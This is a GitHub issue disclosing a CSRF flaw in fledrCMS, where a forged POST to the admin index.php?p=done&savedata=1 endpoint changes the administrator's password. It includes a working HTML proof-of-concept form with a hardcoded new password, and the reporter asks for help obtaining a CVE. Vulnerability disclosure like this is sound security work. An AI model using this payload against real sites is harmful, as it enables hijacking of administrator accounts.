Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

There is a CSRF vulnerability that can modify the administrator's password #2

Open
Westbrookadmin opened this issue Aug 6, 2018 · 1 comment

Comments

@Westbrookadmin
Copy link

Westbrookadmin commented Aug 6, 2018

There is a CSRF vulnerability that can change the administrator's password via index.php?p=done&savedata=1

   POC:

one.html---change the administrator's password

<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://192.168.98.90/fledrCMS-master/admin/index.php?p=done&savedata=1" method="POST">
      <input type="hidden" name="password" value="19971106" />
      <input type="hidden" name="blogtitle" value="My&#32;blog" />
      <input type="hidden" name="theme" value="fledr" />
      <input type="hidden" name="submit" value="Submit" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

@Westbrookadmin Westbrookadmin changed the title There is a CSRF vulnerability that can modify website configuration, such as changing the background password of the website. There is a CSRF vulnerability that can modify website configuration. Aug 6, 2018
@Westbrookadmin Westbrookadmin changed the title There is a CSRF vulnerability that can modify website configuration. There is a CSRF vulnerability that can modify the web site management password Aug 6, 2018
@Westbrookadmin Westbrookadmin changed the title There is a CSRF vulnerability that can modify the web site management password There is a CSRF vulnerability that can modify the administrator's password Aug 6, 2018
@Westbrookadmin
Copy link
Author

Can you help me to apply for a CVE number? thank you very much indeed

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

No branches or pull requests

1 participant